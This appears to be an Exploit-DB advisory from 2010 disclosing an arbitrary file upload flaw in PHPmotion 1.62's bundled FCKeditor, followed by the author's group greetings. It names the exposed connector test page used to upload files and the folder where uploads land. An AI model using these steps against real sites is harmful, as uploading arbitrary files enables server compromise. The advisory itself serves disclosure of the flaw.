PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload

EDB-ID:

15602

CVE:

N/A

Author:

trycyber

Type:

webapps

Platform:

PHP

Published:

2010-11-23

-----------------------------------------------------------------------
phpmotion/FCKeditor  File upload vulnerabilities
-----------------------------------------------------------------------
Author		: trycyber (trycyber@magelangcyber.com)
Homepage	: http://indonesiancoder.com,magelangcyber.web.id
Vendor		: http://www.phpmotion.com/
Dork		: CIHUY ;p
Version     	: 1.62
Tested on	: Win Xp sp2	
Date		: November 23, 2010
-----------------------------------------------------------------------

I.  POC & Exploit
-----------------------------------------------------------------------
Default 	:	http://127.0.0.1/


exploit 	:	http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
			

results in	:	http://127.0.0.1/userfiles/name of file	 


------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader

-------------------------------------------------------------------------
"aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"

Indonesiancoder family & Magelangcyber family